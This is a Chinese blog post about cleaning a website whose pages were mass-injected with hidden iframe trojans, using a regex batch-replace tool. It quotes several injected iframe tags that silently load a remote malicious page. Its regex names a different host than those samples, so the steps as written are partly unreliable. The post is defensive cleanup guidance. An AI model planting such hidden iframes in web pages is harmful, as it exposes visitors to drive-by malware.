网站被批量挂马是经常遇到的事情,一般用批量替换工具很方便就可以批量删除相关代码,但是如果一个网站里面每个页面都被放置了木马,而且代码还都不一样。这种情况如何处理?
下面我们一起来学习一下批量使用替换工具删除相关木马:
因为没有一个页面挂的马是相同的,所以根本删不掉。前几天我的一个朋友就遇到了这个问题。他诉苦道服务器上一个网站被批量挂了木马,仔细一看居然每个页面挂的木马都不一样。
我检查了一下是类似这样的情况:
页面一的木马是:
<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>
页面二的木马是:
<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>
页面三的木马是:
<ifraME src=http://www.hack6.com/isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>
……
仔细看,虽然每个页面上挂的木马不同,但是还是有一定规律的。
这时候,我就在郁闷了,要是能有一个支持正则的批量替换工具就好了。还好补天的areone帮忙,给我介绍了一个小工具,恰恰可以满足这个要求。
打开AFR工具,选择批量替换:
搜索内容部分填写:
<ifraME src=http://88lai.3322.org/u.asp widTH=50 height=0 name=\d{4} naMe=2 boRdeR=0></ifRame>
替换为空 即可。
注意上面语句中红色部分,就是正则表达式了。通过这种方法,就可以批量对木马进行删除了。
很快,清除了4百多个页面上的木马。大功告成。
正则表达式在平时技术方面的应用中用的很多,后面我也会给大家找一些这方面的教材。
转载请注明:IT运维空间 » 安全防护 » 批量使用替换工具删除相关木马
发表评论